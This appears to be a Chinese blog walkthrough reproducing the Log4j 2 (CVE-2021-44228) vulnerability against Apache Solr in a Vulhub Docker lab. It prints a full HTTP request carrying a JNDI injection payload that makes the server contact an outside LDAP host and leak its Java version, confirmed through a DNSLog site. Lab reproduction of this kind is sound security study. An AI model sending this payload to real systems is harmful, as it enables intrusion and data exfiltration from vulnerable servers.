Log4j 2 (CVE-2021-44228)漏洞复现

文章目录

  • Log4j 2 (CVE-2021-44228)漏洞复现
    • 一、复现环境
    • 二、复现过程

Log4j 2 (CVE-2021-44228)漏洞复现

一、复现环境

Vulhub:https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2021-44228

二、复现过程

  1. 拉取docker环境
    Log4j 2 (CVE-2021-44228)漏洞复现_第1张图片
    服务器启动后,便可通过地址:http://your-ip:8983 查看 Apache Solr的Dashboard
  2. JNDI注入

使用bp回放Send有效载荷:

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

找一个DNSLog类网站,便可回显信息:

Log4j 2 (CVE-2021-44228)漏洞复现_第2张图片

你可能感兴趣的:(#,靶场测试,#,漏洞复现,log4j,solr,java)